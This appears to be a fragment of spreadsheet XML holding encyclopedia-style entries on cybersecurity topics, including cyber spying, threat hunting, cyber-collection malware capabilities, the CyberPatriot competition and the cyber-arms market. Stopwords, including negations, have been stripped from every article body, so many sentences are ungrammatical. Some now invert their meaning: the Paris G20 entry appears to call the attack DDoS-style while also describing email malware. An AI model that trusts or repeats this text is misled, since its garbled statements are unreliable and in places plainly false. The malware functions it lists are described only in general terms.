evidence document security data breaches (intrusions). contact relevant authorities, administrators organizations case cyberattack. beware website data breaches wherein stored passwords personally identifiable information publicized. refer state's statute security breach notification laws. "hacking back" legal theorists policy makers increasingly considering authorizing private sector take active measures "hacking back" (also known hackbacks). contrast active attack measures, passive defense measures present reduced risk cyberwarfare, legal, political, economic fallout. contemporary topic debate research question 'when cyber-attack, threat thereof, give rise right self-defense?'in march 2017, graves proposed active cyber defense certainty (acdc) would enhance computer fraud abuse (cfaa) allow individuals private sector certain tools currently restricted cfaa identify attackers prevent attacks hacking them. this presents "chicken egg" problem, wherein everyone allowed hack anyone, everyone would hack everyone skilled resourced would remain. brad maryman warns unintended consequences, stating view "the notion legislate accept level undocumented unmonitored cyber actions anyone thinks hacked unfathomable". also proactive cyber defence cryptoparty information security internet security references external links cybersecurity self-defense, slate moore, alexis; edwards, laurie (2014). cyber self-defense: expert advice avoid online predators, identity theft, cyberbullying. rowman littlefield. isbn 9781493015429. surveillance self-defense, paul carugati: cyber self-defense, talk</t>
  </si>
  <si>
    <t>Cyber spying on universities</t>
  </si>
  <si>
    <t>cyber spying universities practice obtaining secrets information without permission knowledge university information technology system. universities united kingdom, including oxford cambridge, targets, institutions australia.universities targets cyber espionage wealth personally identifiable information possess students, employees, people tickets sporting events, and, university academic medical center, patients treated there. information research projects industrial military application also targets. culture information sharing within universities tends make easy targets.breaches occur people sharing credentials, phishing, web-crawlers inadvertently finding exposed access points, password cracking, standard hacking methods. university credentials bought sold forums, darknet markets black markets.the result efforts included theft military research missile design stealth technologies, well medical data.as precaution attacks, stanford university advises employees take precautions travel abroad.moreover, march 2018, u.s. charged sanctioned nine iranians iranian company mabna institute hacking attempting hack hundreds universities behalf iranian government.credentials used sci-hub access paywalled scientific articles subsequently used hackers seeking breach university firewalls access information. also list data breaches references</t>
  </si>
  <si>
    <t>Cyber spying</t>
  </si>
  <si>
    <t>cyber spying, cyber espionage, practice obtaining secrets information without permission knowledge holder information individuals, competitors, rivals, groups, governments enemies personal, economic, political military advantage using methods internet, networks individual computers proxy servers, cracking techniques malicious software including trojan horses spyware. wholly perpetrated online computer desks professionals bases away countries involve infiltration home computer trained conventional spies moles cases criminal handiwork amateur malicious hackers software programmers. details cyber spying typically involves access secrets classified information control individual computers whole networks strategic advantage psychological, political physical subversion activities sabotage. more recently, cyber spying involves analysis public activity social networking sites like facebook twitter.such operations, like non-cyber espionage, typically illegal victim country fully supported highest level government aggressor country. ethical situation likewise depends one's viewpoint, particularly one's opinion governments involved. examples cozy bear: well-resourced, highly dedicated organized cyber espionage group f-secure believes working russian federation since least 2008. also references sources bill schiller, asia bureau (apr 2009), "chinese ridicule report government officials choose words carefully, never denying country engages cyber-espionage", toronto star (canada), toronto, ontario, canada, retrieved 2009-04-04 kelly, cathal (mar 2009), "cyberspies' code click away simple google search quickly finds link software ghost program used target governments", toronto star (canada), toronto, ontario, canada, retrieved 2009-04-04 chinese cyber spying, infotech.indiatimes.com (times india), march 2009, archived original april 2009, retrieved april 2009 cooper, alex (march 2009), lead cyber war, sleuth says; toronto investigator helped expose hacking embassies, nato", toronto star (canada), toronto, ontario, canada, retrieved 2009-03-31 chinese-based cyber network exposes need better security steve herman march 2009), exiled tibetan government expresses concern cyber-spying traced china, delhi: globalsecurity.org, retrieved 2009-03-31 "chinese government accused cyber spying", belfast telegraph, march 2009 patrick goodenough, international editor (march 2009), china rejects cyber spying allegations; 'dalai lama propaganda', cnsnews.com, archived original march 2009, retrieved 2009-03-31 {{citation}}: |author= generic name (help) harvey, mike (march 2009), "'world's biggest cyber network' snoops classified documents countries", times, london, retrieved 2009-03-30 major cyber network uncovered, news, march 2009, retrieved 2009-03-30 scitech cyber network 'smoking gun' china: expert, canada, march 2009, retrieved 2009-03-30 covert (march 2009), "canadian researchers uncover vast chinese cyber network", national post, mills, ontario, canada, canwest news service warned china 'cyber-spying', news, november 2008, retrieved 2009-04-01 mark hosenball (june 2008), "intelligence cyber-spying dummies", newsweek walton, gregory (april 2008). "year gh0st rat". world association newspapers. archived original 2009-08-11. retrieved 2009-04-01. german court limits cyber spying, news, february 2008 rowan callick; jane macartney (december 2007), "chinese fury cyber claims", australian, archived original august 2009, retrieved march 2009 external links congress investigate google charges chinese internet spying (ahn) archive information warfare monitor tracking cyberpower (university toronto, canada/munk centre)</t>
  </si>
  <si>
    <t>Cyber threat hunting</t>
  </si>
  <si>
    <t>cyber threat hunting proactive cyber defence activity. "the process proactively iteratively searching networks detect isolate advanced threats evade existing security solutions." this contrast traditional threat management measures, firewalls, intrusion detection systems (ids), malware sandbox (computer security) siem systems, typically involve investigation evidence-based data warning potential threat. methodologies threat hunting traditionally manual process, security analyst sifts various data information using knowledge familiarity network create hypotheses potential threats, limited lateral movement threat actors. even effective efficient, however, threat hunting partially automated, machine-assisted, well. case, analyst uses software leverages machine learning user entity behavior analytics (ueba) inform analyst potential risks. analyst investigates potential risks, tracking suspicious behavior network. thus, hunting iterative process, meaning must continuously carried loop, beginning hypothesis. analytics-driven: "machine-learning ueba, used develop aggregated risk scores also serve hunting hypotheses" situational-awareness driven: "crown jewel analysis, enterprise risk assessments, company- employee-level trends" intelligence-driven: "threat intelligence reports, threat intelligence feeds, malware analysis, vulnerability scans"the analyst researches hypothesis going vast amounts data network. results stored used improve automated portion detection system serve foundation future hypotheses. detection maturity level (dml) model expresses threat indicators detected different semantic levels. high semantic indicators goal strategy tactics, techniques procedures (ttps) valuable identify semantic indicators network artifacts atomic indicators addresses. siem tools typically provide indicators relatively semantic levels. there therefore need develop siem tools provide threat indicators higher semantic levels. indicators there types indicators: indicator compromise indicator compromise (ioc) tells action happened reactive mode. this type done looking inward data transaction logs siem data. examples include unusual network traffic, unusual privileged user account activity, login anomalies, increases database read volumes, suspicious registry system file changes, unusual requests traffic showing non-human behavior. these types unusual activities allow security administration teams spot malicious actors earlier cyberattack process. indicator concern using open-source intelligence (osint), data collected publicly available sources used cyberattack detection threat hunting. tactics, techniques procedures (ttps) sans institute identifies threat hunting maturity model follows: initial level maturity, organization relies primarily automated reporting little routine data collection. minimal level maturity, organization incorporates threat intelligence indicator searches. moderate high level routine data collection. procedural level maturity, organization follows analysis procedures created others. high high level routine data collection. innovative level maturity, organization creates data analysis procedures. high high level routine data collection. leading level maturity, automates majority successful data analysis procedures. high high level routine data collection. dwell time dwell time either indicates entire span security incident (initial compromise till detection full cleanup) 'mean time detect' (from initial compromise till detection). according 2022 mandiant m-trends report, cyberattackers operate undetected average days reduction, compared 2016), varies greatly region. mandiant, dwell time days americas) high days emea). study also showed attacks discovered notification external party. example reports seedworm: group compromises government agencies, gas, ngos, telecoms, firms example threat hunting threat hunting using firewalls data enrichment threat hunting methodologies inside network perimeter reactive threat hunting this method triggered malicious event, typically data breach theft discovered. efforts typically focused forensics remediation.proactive threat hunting this method actively seeks ongoing malicious events activities inside network, goal detect progress cyber attack. efforts typically focused detection remediation.outside network perimeter external threat hunting this method proactively seeks malicious threat actor infrastructure predict cyber attacks likely emerge prepare defensive strategies. efforts typically focused cyber threat reconnaissance, threat surface mapping monitoring third-party risks. also bounty program cyber campaign proactive cyber defense references</t>
  </si>
  <si>
    <t>Cyber force</t>
  </si>
  <si>
    <t>cyber force military branch devoted cyberwarfare, cybersecurity, counter-cyberwarfare. responsibilities could also include operations combat cyberterrorism establish cyber power projection. cyber force part military branch combined command. presently, official definition although united states department defense dictionary military associated terms provided relevant concepts indicate cyber force could constituted personnel conduct cyberspace operations cyberspace activities include computer network operations (and three subordinate constructs, attack, defense, exploitation), routine operation defense cyberspace.from international legal perspective, cyber force force armed nature technical sense cyber conflict could established framework self-defense prescribed article united nations charter. united states 2009, united states cyber command created national security agency elevated status full independent unified combatant command 2018. reported branch carried cyber attacks damaged iran's nuclear research facilities using stuxnet.retired united states navy admiral supreme allied commander europe james stavridis, retired united states army general keith alexander, director national security agency commander united states cyber command, retired intelligence officer cyber security businessman david venable, united states military officers called creation united states cyber force. current cyber forces there existing cyber forces several countries case norwegian cyber defence force. notable activities involved incident 2017 announced responded cyber attack carried "fancy bear", cyber espionage group associated russian interests. recently formed cyber forces include dutch ministry defense's defense cyber command (dcc). first commandant, brig. gen. hans folmer, outlined branch's goal cyber capabilities form integral part dutch military action article called "defense cyber command: branch defense tree".the following list outlines cyber forces currently operation around world: information warfare division defense cyber directorate centro respuesta incidencias ciberdefensa norwegian cyber defence force cyber information domain service (cir) cyberspace defense forces army cyber center national cyber force also national cyber security centre (disambiguation) cyber-power literacy list cyber warfare forces references</t>
  </si>
  <si>
    <t>Cyber threat intelligence</t>
  </si>
  <si>
    <t>cyber threat intelligence (cti) knowledge, skills experience-based information concerning occurrence assessment cyber physical threats threat actors intended help mitigate potential attacks harmful events occurring cyberspace. cyber threat intelligence sources include open source intelligence, social media intelligence, human intelligence, technical intelligence, device files, forensically acquired data intelligence internet traffic data derived deep dark web. recent years, threat intelligence become crucial part companies cyber security strategy since allows companies proactive approach determine threats represent greatest risks business. this puts companies proactive front actively trying find vulnerabilities prevents hacks happen. this method gaining importance recent years since, estimates, common method companies hack threat exploitation (47% attacks)threat vulnerabilities risen recent years also covid-19 pandemic people working home makes companies' data vulnerable. growing threats hand, growing sophistication needed threat intelligence, many companies opted recent years outsource threat intelligence activities managed security provider (mssp). types there three overarching, categorical classes cyber threat intelligence: tactical: technical intelligence (including indicators compromise addresses, file names, hashes) used assist identification threat actors operational: details motivation capabilities threat actors, including tools, techniques procedures strategic: intelligence overarching risks associated cyber threats used drive high-level organizational strategy benefits cyber threat intelligence cyber threat intelligence provides number benefits, include: empowers people, organizations agencies develop proactive robust cybersecurity posture bolster overall risk management cyber security policies responses drives momentum toward proactive cybersecurity posture predictive, simply reactive cyber attack enables improved detection risks threats informs better decision-making before, following detection cyber intrusion intended interference it/ot services. enables sharing knowledge, skills experiences among cyber security community practice systems stakeholders. communicates threat surfaces, attack vectors malicious activities directed information technology operational technology platforms. serve fact-based repository evidence successful unsuccessful cyber attacks. provide indicators computer emergency response teams incident response groups. elements cyber threat data information following elements considered cyber threat intelligence: evidence-based: cyber threat evidence obtained malware analysis sure threat valid utility: needs utility positive impact security incident's outcome organization actionable: gained cyber threat intelligence drive security control action, data information attribution cyber threats involve computers, storage devices, software networks cloud-based repositories. prior cyber attack technical information information operational technology, devices, network computers attacker(s) victim(s) collected, stored analyzed. however, identifying person(s) behind attack, motivations, ultimate sponsor attack, termed attribution sometimes difficult. recent efforts threat intelligence emphasize understanding adversary ttps. across industries, organizations started using mitre att&amp;ck framework understand threat actors' ttps identify holes defenses. number recent cyber threat intelligence analytical reports released public private sector organizations attribute cyber attacks. this includes mandiant's apt1 apt28 reports, cert's apt29 report, symantec's dragonfly, waterbug group seedworm reports. sharing 2015 u.s. government legislation form "cybersecurity information sharing act" encouraged sharing indicators government private organizations. this required u.s. federal government facilitate promote objectives: sharing "classified declassified cyber threat indicators possession federal government private entities, nonfederal government agencies, state, tribal, local governments"; sharing "unclassified indicators public"; sharing "information entities cybersecurity threats prevent mitigate adverse effects"; sharing "cybersecurity best practices attention challenges faced small businesses.in 2016, u.s. government agency national institute standards technology (nist) issued publication (nist 800-150) outlined necessity cyber threat information sharing well framework implementation. also cyber intelligence sharing protection denial-of-service attack indicator compromise malware malware analysis ransomware zero-day (computing) references further reading boris giannetto pierluigi paganini (2020). mastering communication cyber intelligence activities: concise user guide. cyber defense magazine. anca dinicu, "nicolae bălcescu" land forces academy, sibiu, romania, cyber threats national security. specific features actors involved bulletin ştiinţific 2(38)/2014 zero day: nuclear cyber sabotage, four documentary thriller warfare world without rules world cyberwar. tells story stuxnet, self-replicating computer malware, known 'worm' ability burrow computer what threat intelligence? blog post providing context adding discussion defining threat intelligence. threat hunting explained short article explaining cyber threat intelligence. known actor cyber threat intelligence site dedicated threat intelligence. mitre att&amp;ck getting started.</t>
  </si>
  <si>
    <t>Cyber-collection</t>
  </si>
  <si>
    <t>cyber-collection refers cyber-warfare techniques order conduct espionage. cyber-collection activities typically rely insertion malware targeted network computer order scan for, collect exfiltrate sensitive information. cyber-collection started back 1996, widespread deployment internet connectivity government corporate systems gained momentum. since time, numerous cases activities.in addition state sponsored examples, cyber-collection also used organized crime identity e-banking theft corporate spies. operation high roller used cyber-collection agents order collect smart-phone information used electronically raid bank accounts. rocra, october, collection system "espionage hire" operation organized criminals sell collected information highest bidder. platforms functionality cyber-collection tools developed governments private interests nearly every computer smart-phone operating system. tools known exist microsoft, apple, linux computers iphone, android, blackberry, windows phones. major manufacturers commercial off-the-shelf (cots) cyber collection technology include gamma group hacking team italy. bespoke cyber-collection tool companies, many offering cots packages zero-day exploits, include endgame, inc. netragard united states vupen france. state intelligence agencies often teams develop cyber-collection tools, stuxnet, require constant source zero-day exploits order insert tools newly targeted systems. specific technical details attack methods often sells figure sums.common functionality cyber-collection systems include: data scan: local network storage scanned find copy files interest, often documents, spreadsheets, design files autocad files system files passwd file. capture location: gps, wifi, network information attached sensors used determine location movement infiltrated device bug: device microphone activated order record audio. likewise, audio streams intended local speakers intercepted device level recorded. hidden private networks bypass corporate network security. compute spied upon plugged legitimate corporate network heavy monitored malware activity time belongs private wifi network outside company network leaking confidential information employee's computer. computer like easily double-agent working department install second wireless card computer special software remotely monitor employee's computer second interface card without aware side-band communication channel pulling information computer. camera: device cameras activated order covertly capture images video. keylogger mouse logger: malware agent capture keystroke, mouse movement click target user makes. combined screen grabs, used obtain passwords entered using virtual on-screen keyboard. screen grabber: malware agent take periodic screen capture images. addition showing sensitive information stored machine, e-banking balances encrypted mail, used combination mouse logger data determine access credentials internet resources. encryption: collected data usually encrypted time capture transmitted live stored later exfiltration. likewise, common practice specific operation specific encryption poly-morphic capabilities cyber-collection agent order ensure detection location compromise others. bypass encryption: because malware agent operates target system access rights user account target system administrator, encryption bypassed. example, interception audio using microphone audio output devices enables malware capture sides encrypted skype call. exfiltration: cyber-collection agents usually exfiltrate captured data discrete manner, often waiting high traffic disguising transmission secure browsing. flash drives used exfiltrate information protected systems. exfiltration systems often involve reverse proxy systems anonymize receiver data. replicate: agents replicate onto media systems, example agent infect files writable network share install onto drives order infect computers protected otherwise network. manipulate files file maintenance: malware used erase traces files. also download install modules updates well data files. this function also used place "evidence" target system, e.g. insert child pornography onto computer politician manipulate votes electronic vote counting machine. combination rules: some agents complex able combine features order provide targeted intelligence collection capabilities. example, bounding boxes microphone activity used turn smart phone smart intercepts conversations within office target. compromised cellphones. since, modern cellphones increasingly similar general purpose computer, cellphones vulnerable cyber-collect attacks computer systems, vulnerable leak extremely sensitive conversational location information attackers. leaking cellphone location conversational information attacker reported number recent cyber stalking cases attacker able victim's location call nearby businesses police authorities make false allegations victim depending location, range telling restaurant staff information tease victim, making false witness victim. instance victim parked large parking attackers call state drug violence activity going description victim directions location. infiltration there several common ways infect access target: injection proxy system placed upstream target individual company, usually internet service provider, injects malware targets system. example, innocent download made user injected malware executable target system accessible government agents. spear phishing: carefully crafted e-mail sent target order entice install malware trojan document drive attack hosted server compromised controlled malware owner. surreptitious entry used infect system. words, spies carefully break target's residence office install malware target's system. upstream monitor sniffer device intercept view data transmitted target system. usually device placed internet service provider. carnivore system developed u.s. famous example type system. based logic telephone intercept, type system limited today widespread encryption data transmission. wireless infiltration system used proximity target target using wireless technology. this usually laptop based system impersonates wifi base station capture target systems relay requests upstream internet. once target systems network, system functions injection proxy upstream monitor order infiltrate monitor target system. preloaded malware infector given dropped target site.cyber-collection agents usually installed payload delivery software constructed using zero-day attacks delivered infected drives, e-mail attachments malicious sites. state sponsored cyber-collections efforts used official operating system certificates place relying security vulnerabilities. flame operation, microsoft states microsoft certificate used impersonate windows update forged; however, experts believe acquired humint efforts. examples operations stuxnet flame duqu bundestrojaner rocra operation high roller also cyberwarfare computer surveillance computer insecurity chinese intelligence operations united states cyber-security regulation industrial espionage ghostnet proactive cyber defence surveillance chaos computer club global surveillance disclosures (2013–present) tailored access operations references</t>
  </si>
  <si>
    <t>Cyber-kinetic attack</t>
  </si>
  <si>
    <t>cyber-kinetic attack targets cyber-physical systems causes direct indirect physical damage, injury death, environmental impact solely exploitation vulnerable information systems processes. notable attacks category recent past targeted critical infrastructure facilities water treatment plants, nuclear power plants, refineries, medical facilities. crossing cyber-physical divide early days computing, security threats typically limited attacks caused destruction data, degraded access computing systems hardware. however, last several decades seen technologies—ranging supervisory control data acquisition (scada) internet things—which describe objects embedded sensors software utilize internet exchange data. such system termed cyber-physical system. such systems cross traditional divide purely in-computer systems (software) real-life systems (physical systems), algorithms autonomously able control physical systems. notably cyber attacks physical impact, causing significant degradation target system, stuxnet aurora worms. stuxnet worm first revealed 2010 specially targeted weaknesses programmable logic controllers (plcs), devices scada category systems. though never positivity attributed, widely believed malicious software developed jointly united states israel disrupt iranian nuclear enrichment facility natanz. also reported stuxnet associated variants infected 30,000 systems lasting presence extremely difficult eradicate purify. both malicious programs exploited zero-day attacks windows-based operating systems.as computing crosses cyber-physical barrier, significant effort spent 'smart' systems, instance smart cities, smart homes, smart manufacturing smart vehicles. context cybersecurity, threats emerging target smart systems. timeline cyber-kinetic attacks attests incidents early 1982. such attacks information systems physical world impacts complete shift paradigms within cyber security community, though unheard many scada systems fielded years little modern security protections instrumented. these types attacks potential bring dynamic forward concept cyber warfare potential impact electrical systems, financial systems, critical infrastructure, communication systems. though, reality, types attacks closer relation espionage idealistically driven attacks, rather overt warfare. cyber-kinetic attacks confused simple denial information system, distributed denial service (ddos) attack. cases, attacks merely deny access information system, cyber-kinetic attack would deny access system physically destroying part system entire system, rather communication access. references</t>
  </si>
  <si>
    <t>Cyber-security regulation</t>
  </si>
  <si>
    <t>CyberCIEGE</t>
  </si>
  <si>
    <t>cyberciege serious game designed teach network security concepts. development sponsored u.s. navy, used training tool agencies u.s. government, universities community colleges. cyberciege covers broad range cybersecurity topics. players purchase configure computers network devices keep demanding users happy (e.g., providing internet access) protecting assets variety attacks. game includes number different scenarios, focus basic training awareness, others advanced network security concepts. "scenario development kit" available creating customizing scenarios. network security components include configurable firewalls, gateways, clients, link encryptors authentication servers. workstations servers include access control lists (acls) configured operating systems enforce label-based mandatory access control policies. players deploy public infrastructure (pki)-based cryptography protect email, traffic vpns. game also includes identity management devices biometric scanners card readers control access workstations physical areas. cyberciege game engine consumes “scenario development language” describes scenario terms users (and goals), assets (and values), initial state scenario terms pre-existing components, conditions triggers provide flow scenario. game engine defined enough fidelity host scenarios ranging e-mail attachment awareness cyber warfare. game play cyberciege scenarios place player situations player must make information assurance decisions. interactive simulation illustrates potential consequences player choices terms attacks information assets disruptions authorized user access assets. game employs hyperbole means engaging students scenario, thus simulation intended always identify actual consequences specific choices. game confronts student problems, conflicts questions considered developing implementing security policy. game designed "construction management simulation" three-dimensional virtual world. players build networks observe virtual users thoughts. each scenario divided multiple phases phase includes objectives player must achieve prior moving next phase. players view status virtual user’s success achieving goals (i.e., accessing enterprise assets computers networks). unproductive users express unhappy thoughts, utter comic book style speech bubbles bang keyboards. players consequences attacks lost money, pop-up messages, video clips burning computers. game engine cyberciege includes sophisticated attack engine assesses network topologies, component configurations, physical security, user training procedural security settings. attack engine weighs resultant vulnerabilities attacker motives compromise assets network—and motive vary asset. thus, assets might defended firewall, assets might require high assurance protection mechanisms. attack types include trojan horses, viruses, trap doors, denial service, insiders (i.e., bribed users lack background checks), un-patched flaws physical attacks. attack engine coupled economy engine measures virtual user’s ability achieve goals (i.e., read write assets) using computers networks. this combination supports scenarios illustrate real-world trade-offs air-gaps versus risks cross-domain solutions accessing assets classified unclassified networks. game engine includes defined assessable conditions resultant triggers allow scenario designer provide players feedback, (e.g., bubble speech characters, screen tickers, pop-up messages, etc.), transition game phases. cyberciege fidelity fidelity game engine intended high enough players make meaningful choices respect deploying network security countermeasures, high engulf player administrative minutiae. cyberciege illustrates abstract functions technical protection mechanisms configuration-related vulnerabilities. example, attack might occur particular firewall port left open specific software service patched. cyberciege designed provide fairly consistent level abstraction among various network computer components technical countermeasures. this seen considering several cyberciege game components. cyberciege firewalls include network filters players block traffic selected application “ports” (e.g., telnet). players configure filters different network interfaces different traffic directions. this lets players consequences leaving ports open (e.g., attacks). allows players experience need open ports (e.g., characters might unable achieve goal unless filter configured allow traffic). cyberciege includes gateways computer based mechanisms players configure identify characteristics protection (e.g., encryption, authentication neither) provided network traffic, depending source destination. this allows cyberciege illustrate risks associated providing unprotected internet access workstation tunnel corporate network. other network components (e.g., workstations) include configuration choices related type component. cyberciege lets players select consequential password policies procedural configuration settings. references external links cyberciege official site</t>
  </si>
  <si>
    <t>CyberPatriot</t>
  </si>
  <si>
    <t>cyberpatriot national youth cyber education program created united states help direct students toward careers cybersecurity computer, science, technology, engineering, mathematics disciplines. program created force association (afa). features annual national youth cyber defense competition high school middle school students. similar collegiate counterpart, collegiate cyber defense competition (ccdc), especially cyberpatriot national finals competition. national youth cyber defense competition thirteenth season called "cyberpatriot xiii" indicating season's competition. cyberpatriot xiii open high schools, middle schools, accredited home school programs around country. jrotc units services, civil patrol squadrons, naval cadet corps divisions also participate competition. outside regular competition, cyberpatriot also hosts additional sub-programs: summer cybercamps elementary school cyber education initiative. northrop grumman foundation "presenting sponsor". british spin program called cyber centurion. history cyberpatriot began 2009 proof concept demonstration afa's warfare symposium orlando, florida. four organizations responsible developing competition force association, u.s. force, defense contractor saic, center infrastructure assurance security (cias) university texas antonio (utsa). eight high school teams, afjrotc civil patrol squadrons competed. second phase program limited force afjrotc civil patrol teams. online training qualification competitions held fall 2009 nearly teams states competing eight slots first in-person national finals competition february 2010, held orlando, florida. final phase developmental program, full national deployment, underway. open division, allows school register, started seasons first season. over 1,500 teams states, canada, dependant schools overseas competed cyberpatriot cyberpatriot began october 2014, 2,100 teams registered compete. middle school division, added cyberpatriot cyberpatriot started october 2016, featured 4,300 registered teams. goals objectives cyberpatriot designed accessible high school middle school student, provides path high school college/workforce, benefits national cyberpatriot partners. program increases awareness cybersecurity delivering basic education competitive format enhances leadership, communication, cooperation skills among competitors. organization preparation teams following members: coach: supervises, chaperones team. usually teacher. does need technical background. competitors: students competitors, alternate) technical mentor (optional): particularly useful coach cyber-savvy. helps teach cyber concepts. team assistant (optional): assistants coach daily administrative tasks related competitioneach team required registered coach registered competitors. coach registration begins late spring allow preparation summer. qualification rounds competition completed online teams’ home locations september early january. competition guidelines competition tournament structure three divisions: open high school division: open public, private, parochial, magnet, charter, home schools, special groups campfire, boys girls club, scouts, church youth groups, girl scouts, etc. all-service division: open jrotc services, civil patrol squadrons, naval cadet corps units. registration waived teams competing all-service division middle school division: open middle schools junior high schools follow common organizations mentioned open high school division.the early rounds competition done online weekends internet teams’ schools sponsoring organizations’ facilities. prior round, teams download virtual image representations operating systems known flaws, cybersecurity vulnerabilities. each team tasked find flaws keeping specified computer functions (services email) working. team progress recorded central cyberpatriot scoring system. scores qualification rounds totaled determine tier team advances platinum: teams. rounds include state (guaranteed), semifinals, national finals gold: middle teams. rounds include state (guaranteed) semifinals. silver: bottom teams. rounds include state (guaranteed) semifinals.in cyberpatriot xiii, rounds total round held later cyberpatriot covid-19 order give coaches time recruit (according email announcements), round determining national finalists teams. teams platinum tier teams eligible qualify national finals. additional rules below: qualification competition begins soon image opened, ends consecutive hours later, score logged. attempting continue time limit reached incur penalties. coach's responsibility ensure team exceed limit. only instance image open given time. opening multiple instance virtual image result penalty. person compete team registered, registered team competition. during competition, outside assistance given received anyone. competitor offer assistance another round ends others begins. outside communication allowed competition. this includes limited verbal, electronic, written coded. offensive activity kind permitted, including limited hacking programs manual code injection, interfering another team social engineering and/or deception, attaining opposing machine. national finals competition scoring semifinal teams division, approximately teams, invited (all-expenses paid) in-person national finals competition spring. cyberpatriot vii, national finals competitions held gaylord national hotel convention center national harbor, maryland march. from cyberpatriot viii season cyberpatriot season, national finals competitions moved hyatt regency baltimore inner harbor baltimore, maryland held april year. beginning cyberpatriot season, national finals competition planned held bethesda north marriott hotel conference center bethesda, maryland outside washington, d.c. march. however, cyberpatriot in-person national finals competition, first planned year bethesda north marriott, canceled covid-19 outbreak virtual, in-home competition held online may, months originally scheduled in-person competition event. cp-xii virtual national finals held 2nd, 2020, marked first-ever online virtual cyberpatriot national finals competition. widespread outbreak covid-19, cyberpatriot xiii season modifications accommodate delay team administration well provisions additional procedures competing home. because spread covid-19 continued, schools restrictions in-person activities, accounted arrangements optionally staying home compete well organization type registration. challenges teams face include: network security master challenge, teams vulnerabilities "images" operating systems purposely tampered protecting "images" "red team" group "hackers" exploit vulnerabilities competitor's machines. leidos digital forensics challenge, teams solve mysteries computer programs. digital crime scene challenge, teams search live "crime scene" digital evidence. cisco networking challenge, teams show knowledge wiring, cisco's packet tracer, cisco quiz.winning teams open service division earn education grants school choice. first place teams earn $2,000 competitor, second place teams earn $1,500 competitor, third place earns $1,000 competitor. scholarship money provided northrop grumman foundation. cyberpatriot vii, first, second, third place, additional $2,000, $1,500, $1,000 awarded teams, respectively, national security agency. criticism competitions, brand teams find difficult successful well-established teams. there however examples hard work determination teams success. example, teams virginia area dominant 2013. more recently teams southern california dominant. 2016 valley middle school middle school division first year competing. cyberpatriot winners external links from 2013 "cyberpatriot: national high school cyber defense competition". uscyberpatriot.org. 2013. archived original 2013-11-23. retrieved 2013-11-19. "cyberpatriot competition rules" (pdf). uscyberpatriot.org. 2013. archived original (pdf) 2013-12-12. retrieved 2013-12-09. "faq what cyberpatriot". uscyberpatriot.org. 2013. archived original 2014-02-26. retrieved 2013-11-19. also list computer science awards references external links uscyberpatriot.org afa.org</t>
  </si>
  <si>
    <t>CyberSource</t>
  </si>
  <si>
    <t>cybersource payment service provider founded 1994. november 2007, cybersource acquired u.s. small business payment services provider authorize.net $565 million.on april 2010, visa inc. acquired cybersource billion. also list on-line payment service providers references</t>
  </si>
  <si>
    <t>Cyberattack during the Paris G20 Summit</t>
  </si>
  <si>
    <t>cyberattack paris summit refers event took place shortly beginning summit held paris, france february 2011. this summit group conference held level governance finance ministers central bank governors opposed summit later year, held cannes involving heads government). unlike well-known cyberattacks, 2009 attacks affecting south korean/american government, news media financial websites, 2007 cyberattacks estonia, attack took place paris summit ddos style attack. instead, attacks involved proliferation email malware attachment, permitted access infected computer. cyber attacks france generally include attacks websites ddos attacks well malware. attacks civil private sectors instead military. like germany many european nations, france proactive cyber defence cyber security recent years. white paper defence national security proclaimed cyberattacks "one main threats national territory" "made prevention reaction cyberattacks major priority organisation national security". this creation french agency national security information systems (anssi) 2009. anssi's workforce increased workforce 2013. comparison, equivalent english german departments boast people. attacks december 2010-january 2011 attacks began december email sent around french ministry finance. email's attachment 'trojan horse' type consisting document embedded malware. once accessed, virus infected computers government's senior officials well forwarding offensive email others. attack infected approximately finance ministry's 170,000 computers. while access computers highest levels office infiltrated departments successfully blocked, owners infiltrated computers worked g20.the attack noticed "strange movements detected e-mail system". following this, anssi monitored situation several weeks. reportedly, intrusion targeted exfiltration documents. financial information sensitive information individuals, also located ministry finance's servers, left alone circulates intranet accessible within ministry. attack reported news media conclusion summit february 2011, discovered month prior january. perpetrators while nationalities hackers unknown, operation "probably asian country". head anssi, patrick pailloux, said perpetrators "determined professionals organised" although identification hackers made. also 2007 cyberattacks estonia trojan horse (computing) references</t>
  </si>
  <si>
    <t>Cyber-arms industry</t>
  </si>
  <si>
    <t>cyber-arms industry markets associated events surrounding sale software exploits, zero-days, cyberweaponry, surveillance technologies, related tools perpetrating cyberattacks. term extend grey black markets online offline.for many years, burgeoning dark market remained niche, available in-the-know well funded. since least 2005, governments including united states, united kingdom, russia, france, israel buying exploits defence contractors individual hackers. this 'legitimate' market zero exploits exists well advertised immediately accessible. attempts openly sell zero exploits governments security vendors keep black market unsuccessful. companies traditional arms producers military services companies systems, eads, leonardo, general dynamics, raytheon, thales expanded cybersecurity markets. however, smaller software companies blue coat amesys also become involved, often drawing attention providing surveillance censorship technologies regimes bashar al-assad syria muammar gaddafi libya.suppliers exploits western governments include massachusetts firm netragard.the trade show world runs every months referred 'international cyber arms bazaar' 'wiretappers ball' focuses surveillance software lawful interception. some cyberarms companies include endgame, inc., gamma group, group, birmingham cyber arms ability. circles, former surveillance business, merged group 2014.on july 2017 google researchers announced discovery spyware named "lipizzan". according google, "lipizzan's code contains references cyber arms company, equus technologies.". internet popular internet forums generally russian ukrainian reports english-only, chinese-only, german-only, vietnamese-only sites, among others. phishing, spear-phishing, social engineer campaigns typically done english, majority potential victims know language. india's central bureau investigation describe proliferation underground markets 'widespread'. colonel john adams, head marine corps intelligence activity expressed concerns markets could allow cyberweapony fall hands hostile governments would otherwise lack expertise attack advanced country's computer systems.online, increasing uses encryption privacy mechanisms record messaging cryptocurrencies.since 2005 darknet markets black markets 'cyber arms bazaar' prices dropping fast cost cyberweaponry plummeting least percent.botnets increasingly rented cyber criminals commodities variety purposes.rdp shops offer cheap access hacked computers. vendor responses recent years, many software firms success bounty programs, cases vupen's chrome exploit rejected market value. meanwhile, vendors spent million 2005 2015 buying exploits software. this behaviour criticised head united states cyber command, general keith alexander. this criticism known "building black market". notable markets cyber arms bazaar darknet market operating various eastern european countries, trafficking crimeware hacking tools since least year 2000. kellermann, chief cybersecurity officer trend micro, estimates percent financial sector cyberattacks could traced back bazaar, retail cyberattacks behind. darkode therealdeal also cybercrime cyberwarfare cyberweapon market zero-day exploits mass surveillance industry vulnerabilities equities process references</t>
  </si>
  <si>
    <t>Cyber espionage</t>
  </si>
  <si>
    <t>Cyber and Information Domain Service</t>
  </si>
  <si>
